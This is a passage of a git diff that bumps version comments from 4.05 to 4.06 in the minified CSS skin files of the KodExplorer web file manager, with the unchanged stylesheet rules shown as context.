a:hover{background:#ffd987;border-color:transparent;color:#fff;border-radius:0px;color:#444;border-radius:0;filter:none;}body .frame-main .frame-left .ztree li a.curSelectedNode,body .frame-main .frame-left .ztree li a.curSelectedNode:hover,body .frame-main .frame-left .ztree li a.curDropTreeNode{background:#0EA460;border-color:transparent;color:#fff;border-radius:0px;filter:none;}body .frame-main .frame-left .ztree li a.curSelectedNode .children-open i.font-icon,body .frame-main .frame-left .ztree li a.curSelectedNode:hover .children-open i.font-icon,body .frame-main .frame-left .ztree li a.curDropTreeNode .children-open i.font-icon{color:#fff;}body .frame-main .frame-right .frame-right-main .tools .btn.toolbar-path-more{border-radius:0;}body div.file-continer .file.file-not-writeable,body .frame-main .frame-left .ztree li a.file-not-writeable{color:#3ec3ff !important;}body .file-select{background:#0EA460;border-color:transparent;color:#fff;border-radius:0px;filter:none;}body .file-select .children-open i.font-icon{color:#fff;}body .file-hover{background:#ffd987;border-color:transparent;color:#fff;border-radius:0px;color:#444;border-radius:0;filter:none;}body div.file-continer.file-list-split .file.file2{background:none;}body div.file-continer.file-list-split .file.select-split-parent{background:#e3f0ff;}body div.file-continer.file-list-split .file.hover{background:#ffd987;border-color:transparent;color:#fff;border-radius:0px;color:#444;border-radius:0;filter:none;}body div.file-continer.file-list-split .file.select.select-split-parent{background:#0EA460;border-color:transparent;color:#fff;border-radius:0px;filter:none;}body div.file-continer.file-list-split .file.select.select-split-parent .children-open i.font-icon{color:#fff;}body div.file-continer .file.file2{background:#fff8e8;}body div.file-continer .file.select,body div.file-continer .file.file-select-drag-temp{background:#0EA460;border-color:transparent;color:#fff;border-radius:0px;filter:none;}body div.file-continer .file.select .children-open i.font-icon,body div.file-continer .file.file-select-drag-temp .children-open i.font-icon{color:#fff;}body div.file-continer .file.hover{background:#ffd987;border-color:transparent;color:#fff;border-radius:0px;color:#444;border-radius:0;filter:none;}body div.file-continer .file.hover.select,body div.file-continer .file.hover.file-select-drag-temp{background:#0EA460;border-color:transparent;color:#fff;border-radius:0px;filter:none;}body div.file-continer .file.hover.select .children-open i.font-icon,body div.file-continer .file.hover.file-select-drag-temp .children-open i.font-icon{color:#fff;}body div.file-continer .file.select.file2,body div.file-continer .file.file-select-drag-temp.file2{background:#0EA460;border-color:transparent;color:#fff;border-radius:0px;filter:none;}body div.file-continer .file.select.file2 .children-open i.font-icon,body div.file-continer .file.file-select-drag-temp.file2 .children-open i.font-icon{color:#fff;}body div.file-continer.file-list-split .file.select,body div.file-continer.file-list-split .file.file-select-drag-temp,body div.file-continer.file-list-list .file.select,body div.file-continer.file-list-list .file.file-select-drag-temp{border-bottom:1px solid #10bb6e !important;}body .context-menu-list{box-shadow:0 10px 40px rgba(0,0,0,0.4);border-radius:0;border:1px solid rgba(0,0,0,0.1);background-clip:padding-box;}body .context-menu-list .context-menu-item{line-height:25px;height:25px;padding:0 15px 0 20px;}body .context-menu-list .context-menu-item.hover,body .context-menu-list .context-menu-item.selected.hover{background:#0c8d52;}body #body .menu-left,body #body .app-menu-left{background:#0c8d52;}body #body .menu-left h1,body #body .app-menu-left h1{color:#fff;font-weight:400;}body #body .menu-left .setting a,body #body .app-menu-left .setting a{color:#fff;}body #body .menu-left .setting a:hover,body #body .app-menu-left .setting a:hover{background:#0fb268;}body #body .menu-left .setting a.selected,body #body .app-menu-left .setting a.selected{background:#10bb6e;border-color:#fff;color:#fff;}body #body .menu-left .line,body #body .app-menu-left .line{color:#fff;border-color:#aaa;border-color:rgba(255,255,255,0.3);}body #body .main .list{border-radius:0;}body #body .main .nav{border-color:#0EA460;}body #body .main .nav a:hover{background:#ddd;color:#0EA460;}body #body .main .nav a.this,body #body .main .nav a.this:hover{background:#0EA460;}body .edit-tab .tabs{border-bottom:1px solid #ddd;}body .edit-tab .tabs .tab{background:#f6f6f6;color:#666;}body .edit-tab .tabs .close{opacity:0.05;filter:alpha(opacity=5);text-shadow:none;color:#fff;}body .edit-tab .tabs .tab.hover{background:#eee;}body .edit-tab .tabs .add{background:#ddd;border:1px solid #eee;color:#666;}body .edit-tab .tabs .tab.this{background:#63acff;border-left:1px solid #63acff;margin-left:-1px;border-right-color:#63acff;}body .edit-tab .tabs .tab.this .close{opacity:0.4;filter:alpha(opacity=40);}body .edit-tab .tabs .tab.hover .close{opacity:0.7;filter:alpha(opacity=70);}body .edit-tab .tabs .edit-changed a.close{opacity:1;filter:alpha(opacity=100);}body .edit-tab .tabs .tab.this.edit-changed a.close{color:#fff;}body .edit-tab .draggable-dragging{background:#f6f6f6;border-left:3px solid #63acff;margin-left:-3px;} -/* ver 4.05(2017-08-26) [build 1503738071.2935] */ \ No newline at end of file +/* ver 4.06(2017-08-30) [build 1504100996.1836] */ \ No newline at end of file diff --git a/static/style/skin/metro_orange.css b/static/style/skin/metro_orange.css index 39972b0..cd3c331 100755 --- a/static/style/skin/metro_orange.css +++ b/static/style/skin/metro_orange.css @@ -1,3 +1,3 @@ -/* power by kodexplorer ver 4.05(2017-08-26) [build 1503738071.4426] */ +/* power by kodexplorer ver 4.06(2017-08-30) [build 1504100996.3178] */ body{position:absolute;top:0px;left:0px;bottom:0px;right:0px;}body .btn-group .btn{border-radius:0px;}body .dropdown-menu{border-radius:0px;}body .dropdown-menu a:hover,body .dropdown-menu .this a{background:#FF8F32;color:#fff;}body#page-desktop .topbar{background-color:rgba(255,143,50,0.5);}body#page-desktop .topbar .content .open .topbar-menu,body#page-desktop .topbar .content .topbar-menu:hover,body#page-desktop .topbar .content .topbar-menu.this{background:rgba(255,143,50,0.3);}body .topbar{background:#FF8F32;}body .topbar .content .topbar-menu{border-color:#ff9d4c;}body .topbar .content .open .topbar-menu,body .topbar .content .topbar-menu:hover,body .topbar .content .topbar-menu.this,body .topbar .content .top-right ul a.this{background:#ff9d4c;border-color:#ff9d4c;}body .aui-outer{*border:1px solid #FF8F32;border:1px solid #FF8F32 \0/IE9;}body .aui-outer .aui-state-focus .aui-title,body .aui-outer .aui-title{background:#FF8F32;}body .aui-outer .aui-buttons button.aui-state-highlight{background:#FF8F32;}body .aui-outer .aui-buttons button.aui-state-highlight:hover{background:#ff9d4c;}body .aui-outer .aui-buttons button.aui-state-highlight:active{background:#ffb97f;}body .aui-outer .aui-min:hover,body .aui-outer .aui-max:hover{background:#ffab65;}body .aui-outer .aui-min:active,body .aui-outer .aui-max:active{background:#ffb97f;}body div.dialog-simple .aui-title{border-radius:0;}body .select-container{border:1px solid #984500;background-color:#FF8F32;}body .header-middle .btn-left-radius,body .header-middle .btn-right-radius,body .frame-header .header-content .header-right .btn-left-radius,body .frame-header .header-content .header-right .btn-right-radius{border-radius:0;}body .frame-main .frame-left{background:#fafafa;}body .frame-main .frame-left .ztree li a{border-color:transparent;}body .frame-main .frame-left .ztree li a:hover{background:#ffd987;border-color:transparent;color:#fff;border-radius:0px;color:#444;border-radius:0;filter:none;}body .frame-main .frame-left .ztree li a.curSelectedNode,body .frame-main .frame-left .ztree li a.curSelectedNode:hover,body .frame-main .frame-left .ztree li a.curDropTreeNode{background:#FF8F32;border-color:transparent;color:#fff;border-radius:0px;filter:none;}body .frame-main .frame-left .ztree li a.curSelectedNode .children-open i.font-icon,body .frame-main .frame-left .ztree li a.curSelectedNode:hover .children-open i.font-icon,body .frame-main .frame-left .ztree li a.curDropTreeNode .children-open i.font-icon{color:#fff;}body .frame-main .frame-right .frame-right-main .tools .btn.toolbar-path-more{border-radius:0;}body div.file-continer .file.file-not-writeable,body .frame-main .frame-left .ztree li a.file-not-writeable{color:#3ec3ff !important;}body .file-select{background:#FF8F32;border-color:transparent;color:#fff;border-radius:0px;filter:none;}body .file-select .children-open i.font-icon{color:#fff;}body .file-hover{background:#ffd987;border-color:transparent;color:#fff;border-radius:0px;color:#444;border-radius:0;filter:none;}body div.file-continer.file-list-split .file.file2{background:none;}body div.file-continer.file-list-split .file.select-split-parent{background:#e3f0ff;}body div.file-continer.file-list-split .file.hover{background:#ffd987;border-color:transparent;color:#fff;border-radius:0px;color:#444;border-radius:0;filter:none;}body div.file-continer.file-list-split .file.select.select-split-parent{background:#FF8F32;border-color:transparent;color:#fff;border-radius:0px;filter:none;}body div.file-continer.file-list-split .file.select.select-split-parent .children-open i.font-icon{color:#fff;}body div.file-continer .file.file2{background:#fff8e8;}body div.file-continer .file.select,body div.file-continer .file.file-select-drag-temp{background:#FF8F32;border-color:transparent;color:#fff;border-radius:0px;filter:none;}body div.file-continer .file.select .children-open i.font-icon,body div.file-continer .file.file-select-drag-temp .children-open i.font-icon{color:#fff;}body div.file-continer .file.hover{background:#ffd987;border-color:transparent;color:#fff;border-radius:0px;color:#444;border-radius:0;filter:none;}body div.file-continer .file.hover.select,body div.file-continer .file.hover.file-select-drag-temp{background:#FF8F32;border-color:transparent;color:#fff;border-radius:0px;filter:none;}body div.file-continer .file.hover.select .children-open i.font-icon,body div.file-continer .file.hover.file-select-drag-temp .children-open i.font-icon{color:#fff;}body div.file-continer .file.select.file2,body div.file-continer .file.file-select-drag-temp.file2{background:#FF8F32;border-color:transparent;color:#fff;border-radius:0px;filter:none;}body div.file-continer .file.select.file2 .children-open i.font-icon,body div.file-continer .file.file-select-drag-temp.file2 .children-open i.font-icon{color:#fff;}body div.file-continer.file-list-split .file.select,body div.file-continer.file-list-split .file.file-select-drag-temp,body div.file-continer.file-list-list .file.select,body div.file-continer.file-list-list .file.file-select-drag-temp{border-bottom:1px solid #ff9d4c !important;}body .context-menu-list{box-shadow:0 10px 40px rgba(0,0,0,0.4);border-radius:0;border:1px solid rgba(0,0,0,0.1);background-clip:padding-box;}body .context-menu-list .context-menu-item{line-height:25px;height:25px;padding:0 15px 0 20px;}body .context-menu-list .context-menu-item.hover,body .context-menu-list .context-menu-item.selected.hover{background:#ff8119;}body #body .menu-left,body #body .app-menu-left{background:#ff8119;}body #body .menu-left h1,body #body .app-menu-left h1{color:#fff;font-weight:400;}body #body .menu-left .setting a,body #body .app-menu-left .setting a{color:#fff;}body #body .menu-left .setting a:hover,body #body .app-menu-left .setting a:hover{background:#ff9741;}body #body .menu-left .setting a.selected,body #body .app-menu-left .setting a.selected{background:#ff9d4c;border-color:#fff;color:#fff;}body #body .menu-left .line,body #body .app-menu-left .line{color:#fff;border-color:#aaa;border-color:rgba(255,255,255,0.3);}body #body .main .list{border-radius:0;}body #body .main .nav{border-color:#FF8F32;}body #body .main .nav a:hover{background:#ddd;color:#FF8F32;}body #body .main .nav a.this,body #body .main .nav a.this:hover{background:#FF8F32;}body .edit-tab .tabs{border-bottom:1px solid #ddd;}body .edit-tab .tabs .tab{background:#f6f6f6;color:#666;}body .edit-tab .tabs .close{opacity:0.05;filter:alpha(opacity=5);text-shadow:none;color:#fff;}body .edit-tab .tabs .tab.hover{background:#eee;}body .edit-tab .tabs .add{background:#ddd;border:1px solid #eee;color:#666;}body .edit-tab .tabs .tab.this{background:#63acff;border-left:1px solid #63acff;margin-left:-1px;border-right-color:#63acff;}body .edit-tab .tabs .tab.this .close{opacity:0.4;filter:alpha(opacity=40);}body .edit-tab .tabs .tab.hover .close{opacity:0.7;filter:alpha(opacity=70);}body .edit-tab .tabs .edit-changed a.close{opacity:1;filter:alpha(opacity=100);}body .edit-tab .tabs .tab.this.edit-changed a.close{color:#fff;}body .edit-tab .draggable-dragging{background:#f6f6f6;border-left:3px solid #63acff;margin-left:-3px;} -/* ver 4.05(2017-08-26) [build 1503738071.4427] */ \ No newline at end of file +/* ver 4.06(2017-08-30) [build 1504100996.3179] */ \ No newline at end of file diff --git a/static/style/skin/metro_pink.css b/static/style/skin/metro_pink.css index 3a6674a..7095b20 100755 --- a/static/style/skin/metro_pink.css +++ b/static/style/skin/metro_pink.css @@ -1,3 +1,3 @@ -/* power by kodexplorer ver 4.05(2017-08-26) [build 1503738071.3971] */ +/* power by kodexplorer ver 4.06(2017-08-30) [build 1504100996.2749] */ body{position:absolute;top:0px;left:0px;bottom:0px;right:0px;}body .btn-group .btn{border-radius:0px;}body .dropdown-menu{border-radius:0px;}body .dropdown-menu a:hover,body .dropdown-menu .this a{background:#DC4FAD;color:#fff;}body#page-desktop .topbar{background-color:rgba(220,79,173,0.5);}body#page-desktop .topbar .content .open .topbar-menu,body#page-desktop .topbar .content .topbar-menu:hover,body#page-desktop .topbar .content .topbar-menu.this{background:rgba(220,79,173,0.3);}body .topbar{background:#DC4FAD;}body .topbar .content .topbar-menu{border-color:#e064b7;}body .topbar .content .open .topbar-menu,body .topbar .content .topbar-menu:hover,body .topbar .content .topbar-menu.this,body .topbar .content .top-right ul a.this{background:#e064b7;border-color:#e064b7;}body .aui-outer{*border:1px solid #DC4FAD;border:1px solid #DC4FAD \0/IE9;}body .aui-outer .aui-state-focus .aui-title,body .aui-outer .aui-title{background:#DC4FAD;}body .aui-outer .aui-buttons button.aui-state-highlight{background:#DC4FAD;}body .aui-outer .aui-buttons button.aui-state-highlight:hover{background:#e064b7;}body .aui-outer .aui-buttons button.aui-state-highlight:active{background:#e98fcb;}body .aui-outer .aui-min:hover,body .aui-outer .aui-max:hover{background:#e47ac1;}body .aui-outer .aui-min:active,body .aui-outer .aui-max:active{background:#e98fcb;}body div.dialog-simple .aui-title{border-radius:0;}body .select-container{border:1px solid #7a1859;background-color:#DC4FAD;}body .header-middle .btn-left-radius,body .header-middle .btn-right-radius,body .frame-header .header-content .header-right .btn-left-radius,body .frame-header .header-content .header-right .btn-right-radius{border-radius:0;}body .frame-main .frame-left{background:#fafafa;}body .frame-main .frame-left .ztree li a{border-color:transparent;}body .frame-main .frame-left .ztree li a:hover{background:#ffd987;border-color:transparent;color:#fff;border-radius:0px;color:#444;border-radius:0;filter:none;}body .frame-main .frame-left .ztree li a.curSelectedNode,body .frame-main .frame-left .ztree li a.curSelectedNode:hover,body .frame-main .frame-left .ztree li a.curDropTreeNode{background:#DC4FAD;border-color:transparent;color:#fff;border-radius:0px;filter:none;}body .frame-main .frame-left .ztree li a.curSelectedNode .children-open i.font-icon,body .frame-main .frame-left .ztree li a.curSelectedNode:hover .children-open i.font-icon,body .frame-main .frame-left .ztree li a.curDropTreeNode .children-open i.font-icon{color:#fff;}body .frame-main .frame-right .frame-right-main .tools .btn.toolbar-path-more{border-radius:0;}body div.file-continer .file.file-not-writeable,body .frame-main .frame-left .ztree li a.file-not-writeable{color:#3ec3ff !important;}body .file-select{background:#DC4FAD;border-color:transparent;color:#fff;border-radius:0px;filter:none;}body .file-select .children-open i.font-icon{color:#fff;}body .file-hover{background:#ffd987;border-color:transparent;color:#fff;border-radius:0px;color:#444;border-radius:0;filter:none;}body div.file-continer.file-list-split .file.file2{background:none;}body div.file-continer.file-list-split .file.select-split-parent{background:#e3f0ff;}body div.file-continer.file-list-split .file.hover{background:#ffd987;border-color:transparent;color:#fff;border-radius:0px;color:#444;border-radius:0;filter:none;}body div.file-continer.file-list-split .file.select.select-split-parent{background:#DC4FAD;border-color:transparent;color:#fff;border-radius:0px;filter:none;}body div.file-continer.file-list-split .file.select.select-split-parent .children-open i.font-icon{color:#fff;}body div.file-continer .file.file2{background:#fff8e8;}body div.file-continer .file.select,body div.file-continer .file.file-select-drag-temp{background:#DC4FAD;border-color:transparent;color:#fff;border-radius:0px;filter:none;}body div.file-continer .file.select .children-open i.font-icon,body div.file-continer .file.file-select-drag-temp .children-open i.font-icon{color:#fff;}body div.file-continer .file.hover{background:#ffd987;border-color:transparent;color:#fff;border-radius:0px;color:#444;border-radius:0;filter:none;}body div.file-continer .file.hover.select,body div.file-continer .file.hover.file-select-drag-temp{background:#DC4FAD;border-color:transparent;color:#fff;border-radius:0px;filter:none;}body div.file-continer .file.hover.select .children-open i.font-icon,body div.file-continer .file.hover.file-select-drag-temp .children-open i.font-icon{color:#fff;}body div.file-continer .file.select.file2,body div.file-continer .file.file-select-drag-temp.file2{background:#DC4FAD;border-color:transparent;color:#fff;border-radius:0px;filter:none;}body div.file-continer .file.select.file2 .children-open i.font-icon,body div.file-continer .file.file-select-drag-temp.file2 .children-open i.font-icon{color:#fff;}body div.file-continer.file-list-split .file.select,body div.file-continer.file-list-split .file.file-select-drag-temp,body div.file-continer.file-list-list .file.select,body div.file-continer.file-list-list .file.file-select-drag-temp{border-bottom:1px solid #e064b7 !important;}body .context-menu-list{box-shadow:0 10px 40px rgba(0,0,0,0.4);border-radius:0;border:1px solid rgba(0,0,0,0.1);background-clip:padding-box;}body .context-menu-list .context-menu-item{line-height:25px;height:25px;padding:0 15px 0 20px;}body .context-menu-list .context-menu-item.hover,body .context-menu-list .context-menu-item.selected.hover{background:#d83aa3;}body #body .menu-left,body #body .app-menu-left{background:#d83aa3;}body #body .menu-left h1,body #body .app-menu-left h1{color:#fff;font-weight:400;}body #body .menu-left .setting a,body #body .app-menu-left .setting a{color:#fff;}body #body .menu-left .setting a:hover,body #body .app-menu-left .setting a:hover{background:#df5cb3;}body #body .menu-left .setting a.selected,body #body .app-menu-left .setting a.selected{background:#e064b7;border-color:#fff;color:#fff;}body #body .menu-left .line,body #body .app-menu-left .line{color:#fff;border-color:#aaa;border-color:rgba(255,255,255,0.3);}body #body .main .list{border-radius:0;}body #body .main .nav{border-color:#DC4FAD;}body #body .main .nav a:hover{background:#ddd;color:#DC4FAD;}body #body .main .nav a.this,body #body .main .nav a.this:hover{background:#DC4FAD;}body .edit-tab .tabs{border-bottom:1px solid #ddd;}body .edit-tab .tabs .tab{background:#f6f6f6;color:#666;}body .edit-tab .tabs .close{opacity:0.05;filter:alpha(opacity=5);text-shadow:none;color:#fff;}body .edit-tab .tabs .tab.hover{background:#eee;}body .edit-tab .tabs .add{background:#ddd;border:1px solid #eee;color:#666;}body .edit-tab .tabs .tab.this{background:#63acff;border-left:1px solid #63acff;margin-left:-1px;border-right-color:#63acff;}body .edit-tab .tabs .tab.this .close{opacity:0.4;filter:alpha(opacity=40);}body .edit-tab .tabs .tab.hover .close{opacity:0.7;filter:alpha(opacity=70);}body .edit-tab .tabs .edit-changed a.close{opacity:1;filter:alpha(opacity=100);}body .edit-tab .tabs .tab.this.edit-changed a.close{color:#fff;}body .edit-tab .draggable-dragging{background:#f6f6f6;border-left:3px solid #63acff;margin-left:-3px;} -/* ver 4.05(2017-08-26) [build 1503738071.3971] */ \ No newline at end of file +/* ver 4.06(2017-08-30) [build 1504100996.2749] */ \ No newline at end of file diff --git a/static/style/skin/metro_purple.css b/static/style/skin/metro_purple.css index 22884f0..19440cd 100755 --- a/static/style/skin/metro_purple.css +++ b/static/style/skin/metro_purple.css @@ -1,3 +1,3 @@ -/* power by kodexplorer ver 4.05(2017-08-26) [build 1503738071.3497] */ +/* power by kodexplorer ver 4.06(2017-08-30) [build 1504100996.2286] */ body{position:absolute;top:0px;left:0px;bottom:0px;right:0px;}body .btn-group .btn{border-radius:0px;}body .dropdown-menu{border-radius:0px;}body .dropdown-menu a:hover,body .dropdown-menu .this a{background:#8D3CC4;color:#fff;}body#page-desktop .topbar{background-color:rgba(141,60,196,0.5);}body#page-desktop .topbar .content .open .topbar-menu,body#page-desktop .topbar .content .topbar-menu:hover,body#page-desktop .topbar .content .topbar-menu.this{background:rgba(141,60,196,0.3);}body .topbar{background:#8D3CC4;}body .topbar .content .topbar-menu{border-color:#9850ca;}body .topbar .content .open .topbar-menu,body .topbar .content .topbar-menu:hover,body .topbar .content .topbar-menu.this,body .topbar .content .top-right ul a.this{background:#9850ca;border-color:#9850ca;}body .aui-outer{*border:1px solid #8D3CC4;border:1px solid #8D3CC4 \0/IE9;}body .aui-outer .aui-state-focus .aui-title,body .aui-outer .aui-title{background:#8D3CC4;}body .aui-outer .aui-buttons button.aui-state-highlight{background:#8D3CC4;}body .aui-outer .aui-buttons button.aui-state-highlight:hover{background:#9850ca;}body .aui-outer .aui-buttons button.aui-state-highlight:active{background:#af77d6;}body .aui-outer .aui-min:hover,body .aui-outer .aui-max:hover{background:#a463d0;}body .aui-outer .aui-min:active,body .aui-outer .aui-max:active{background:#af77d6;}body div.dialog-simple .aui-title{border-radius:0;}body .select-container{border:1px solid #39184f;background-color:#8D3CC4;}body .header-middle .btn-left-radius,body .header-middle .btn-right-radius,body .frame-header .header-content .header-right .btn-left-radius,body .frame-header .header-content .header-right .btn-right-radius{border-radius:0;}body .frame-main .frame-left{background:#fafafa;}body .frame-main .frame-left .ztree li a{border-color:transparent;}body .frame-main .frame-left .ztree li a:hover{background:#ffd987;border-color:transparent;color:#fff;border-radius:0px;color:#444;border-radius:0;filter:none;}body .frame-main .frame-left .ztree li a.curSelectedNode,body .frame-main .frame-left .ztree li a.curSelectedNode:hover,body .frame-main .frame-left .ztree li a.curDropTreeNode{background:#8D3CC4;border-color:transparent;color:#fff;border-radius:0px;filter:none;}body .frame-main .frame-left .ztree li a.curSelectedNode .children-open i.font-icon,body .frame-main .frame-left .ztree li a.curSelectedNode:hover .children-open i.font-icon,body .frame-main .frame-left .ztree li a.curDropTreeNode .children-open i.font-icon{color:#fff;}body .frame-main .frame-right .frame-right-main .tools .btn.toolbar-path-more{border-radius:0;}body div.file-continer .file.file-not-writeable,body .frame-main .frame-left .ztree li a.file-not-writeable{color:#3ec3ff !important;}body .file-select{background:#8D3CC4;border-color:transparent;color:#fff;border-radius:0px;filter:none;}body .file-select .children-open i.font-icon{color:#fff;}body .file-hover{background:#ffd987;border-color:transparent;color:#fff;border-radius:0px;color:#444;border-radius:0;filter:none;}body div.file-continer.file-list-split .file.file2{background:none;}body div.file-continer.file-list-split .file.select-split-parent{background:#e3f0ff;}body div.file-continer.file-list-split .file.hover{background:#ffd987;border-color:transparent;color:#fff;border-radius:0px;color:#444;border-radius:0;filter:none;}body div.file-continer.file-list-split .file.select.select-split-parent{background:#8D3CC4;border-color:transparent;color:#fff;border-radius:0px;filter:none;}body div.file-continer.file-list-split .file.select.select-split-parent .children-open i.font-icon{color:#fff;}body div.file-continer .file.file2{background:#fff8e8;}body div.file-continer .file.select,body div.file-continer .file.file-select-drag-temp{background:#8D3CC4;border-color:transparent;color:#fff;border-radius:0px;filter:none;}body div.file-continer .file.select .children-open i.font-icon,body div.file-continer .file.file-select-drag-temp .children-open i.font-icon{color:#fff;}body div.file-continer .file.hover{background:#ffd987;border-color:transparent;color:#fff;border-radius:0px;color:#444;border-radius:0;filter:none;}body div.file-continer .file.hover.select,body div.file-continer .file.hover.file-select-drag-temp{background:#8D3CC4;border-color:transparent;color:#fff;border-radius:0px;filter:none;}body div.file-continer .file.hover.select .children-open i.font-icon,body div.file-continer .file.hover.file-select-drag-temp .children-open i.font-icon{color:#fff;}body div.file-continer .file.select.file2,body div.file-continer .file.file-select-drag-temp.file2{background:#8D3CC4;border-color:transparent;color:#fff;border-radius:0px;filter:none;}body div.file-continer .file.select.file2 .children-open i.font-icon,body div.file-continer .file.file-select-drag-temp.file2 .children-open i.font-icon{color:#fff;}body div.file-continer.file-list-split .file.select,body div.file-continer.file-list-split .file.file-select-drag-temp,body div.file-continer.file-list-list .file.select,body div.file-continer.file-list-list .file.file-select-drag-temp{border-bottom:1px solid #9850ca !important;}body .context-menu-list{box-shadow:0 10px 40px rgba(0,0,0,0.4);border-radius:0;border:1px solid rgba(0,0,0,0.1);background-clip:padding-box;}body .context-menu-list .context-menu-item{line-height:25px;height:25px;padding:0 15px 0 20px;}body .context-menu-list .context-menu-item.hover,body .context-menu-list .context-menu-item.selected.hover{background:#7f36b1;}body #body .menu-left,body #body .app-menu-left{background:#7f36b1;}body #body .menu-left h1,body #body .app-menu-left h1{color:#fff;font-weight:400;}body #body .menu-left .setting a,body #body .app-menu-left .setting a{color:#fff;}body #body .menu-left .setting a:hover,body #body .app-menu-left .setting a:hover{background:#9448c8;}body #body .menu-left .setting a.selected,body #body .app-menu-left .setting a.selected{background:#9850ca;border-color:#fff;color:#fff;}body #body .menu-left .line,body #body .app-menu-left .line{color:#fff;border-color:#aaa;border-color:rgba(255,255,255,0.3);}body #body .main .list{border-radius:0;}body #body .main .nav{border-color:#8D3CC4;}body #body .main .nav a:hover{background:#ddd;color:#8D3CC4;}body #body .main .nav a.this,body #body .main .nav a.this:hover{background:#8D3CC4;}body .edit-tab .tabs{border-bottom:1px solid #ddd;}body .edit-tab .tabs .tab{background:#f6f6f6;color:#666;}body .edit-tab .tabs .close{opacity:0.05;filter:alpha(opacity=5);text-shadow:none;color:#fff;}body .edit-tab .tabs .tab.hover{background:#eee;}body .edit-tab .tabs .add{background:#ddd;border:1px solid #eee;color:#666;}body .edit-tab .tabs .tab.this{background:#63acff;border-left:1px solid #63acff;margin-left:-1px;border-right-color:#63acff;}body .edit-tab .tabs .tab.this .close{opacity:0.4;filter:alpha(opacity=40);}body .edit-tab .tabs .tab.hover .close{opacity:0.7;filter:alpha(opacity=70);}body .edit-tab .tabs .edit-changed a.close{opacity:1;filter:alpha(opacity=100);}body .edit-tab .tabs .tab.this.edit-changed a.close{color:#fff;}body .edit-tab .draggable-dragging{background:#f6f6f6;border-left:3px solid #63acff;margin-left:-3px;} -/* ver 4.05(2017-08-26) [build 1503738071.3497] */ \ No newline at end of file +/* ver 4.06(2017-08-30) [build 1504100996.2286] */ \ No newline at end of file diff --git a/static/style/skin/win10.css b/static/style/skin/win10.css index 96fa5ef..bce2da5 100755 --- a/static/style/skin/win10.css +++ b/static/style/skin/win10.css @@ -1,3 +1,3 @@ -/* power by kodexplorer ver 4.05(2017-08-26) [build 1503738071.1932] */ +/* power by kodexplorer ver 4.06(2017-08-30) [build 1504100996.0676] */ body{position:absolute;top:0px;left:0px;bottom:0px;right:0px;}body .x-folder{background-image:url("../../images/file_icon/icon_others/folder_win10.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/folder_win10.png',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/folder_win10.png',sizingMethod='scale');}body .x-folder.small{background-image:url("../../images/file_icon/icon_others/folder_win10_small.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/folder_win10_small.png',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/folder_win10_small.png',sizingMethod='scale');height:18px !important;width:18px !important;}body .btn,body .btn-group>.btn,body .btn-group-sm>.btn{border-radius:0px;background-image:none;}body .btn.btn-default,body .btn-group>.btn.btn-default,body .btn-group-sm>.btn.btn-default{border-color:#ddd;}body .btn.btn-default:focus,body .btn.btn-default:hover,body .btn-group>.btn.btn-default:focus,body .btn-group>.btn.btn-default:hover,body .btn-group-sm>.btn.btn-default:focus,body .btn-group-sm>.btn.btn-default:hover{background-color:#e4f8ff;border-color:#aedaff;}body .btn.btn-default:active,body .btn.btn-default.active,body .btn-group>.btn.btn-default:active,body .btn-group>.btn.btn-default.active,body .btn-group-sm>.btn.btn-default:active,body .btn-group-sm>.btn.btn-default.active{color:#365f80;background-color:#e4f8ff;border-color:#93cfff;}body .dropdown-menu{border-radius:0px;}body .dropdown-menu a:hover,body .dropdown-menu .this a{background:#eee;color:#444;}body .topbar{background:#fff;}body .topbar .content{border-bottom:1px solid #eee;}body .topbar .content .topbar-menu{border-color:#eee;color:#666;}body .topbar .content .share-title,body .topbar .content .share-info,body .topbar .content .share-info .time{color:#666;}body .topbar .content .top-right div.share-info-user{color:#666;}body .topbar .content .open .topbar-menu,body .topbar .content .topbar-menu:hover,body .topbar .content .topbar-menu.this,body .topbar .content .top-right ul a.this{background:#eee;border-color:#eee;color:#666;}body .aui-outer{box-shadow:0px 5px 10px rgba(0,0,0,0.2);border:1px solid #bbb;border-color:rgba(0,0,0,0.2);}body .aui-outer .aui-title{background:#fff;color:#666;border-bottom:1px solid #f1f1f1;border-bottom:none;}body .aui-outer .aui-buttons{border-top:solid 1px #eee;background:#f8f8f8;}body .aui-outer .aui-buttons button{padding:1px 1.5em;border:1px solid #ccc;color:#222;background:#eee;}body .aui-outer .aui-buttons button:hover{background:#fbfbfb;}body .aui-outer .aui-buttons button:active{background:#e1e1e1;}body .aui-outer .aui-buttons button.aui-state-highlight{border-color:#96c7ff;box-shadow:0 0 2px #96c7ff;}body .aui-outer .aui-buttons button.aui-state-highlight:hover{color:#111;}body .aui-outer .aui-buttons button.aui-state-highlight:active{color:#111;}body .aui-outer .aui-min{right:80px;background-image:url("data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAoAAAAKCAYAAACNMs+9AAAAEUlEQVQYV2NgGGbgP5F40AMAIN0J96UZJscAAAAASUVORK5CYII=");}body .aui-outer .aui-max{right:40px;background-image:url("data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAoAAAAKCAYAAACNMs+9AAAAGElEQVQYlWNgYGD4TySGEATAqELiFBLEAISgI91xKgmgAAAAAElFTkSuQmCC");}body .aui-outer .aui-close{right:0px;background-image:url("data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAoAAAAKCAYAAACNMs+9AAAAOUlEQVQYlWNgYGD4D8TGDLiBMVQNgzErOwcuxRhy2BTjNABZAp8tCMWEFBGtkCirifIM0cFDVIADAOrvG43QTSHZAAAAAElFTkSuQmCC");}body .aui-outer .aui-min,body .aui-outer .aui-max,body .aui-outer .aui-close{color:#888;background-position:center center;background-color:transparent;background-repeat:no-repeat;height:31px;width:40px;line-height:31px;-webkit-transition:background 0.2s;-moz-transition:background 0.2s;-o-transition:background 0.2s;-ms-transition:background 0.2s;transition:background 0.2s;}body .aui-outer .aui-min:before,body .aui-outer .aui-max:before,body .aui-outer .aui-close:before{content:"";}body .aui-outer .aui-min:hover,body .aui-outer .aui-min:active,body .aui-outer .aui-max:hover,body .aui-outer .aui-max:active,body .aui-outer .aui-close:hover,body .aui-outer .aui-close:active{color:#333;background-color:#ddd;}body .aui-outer 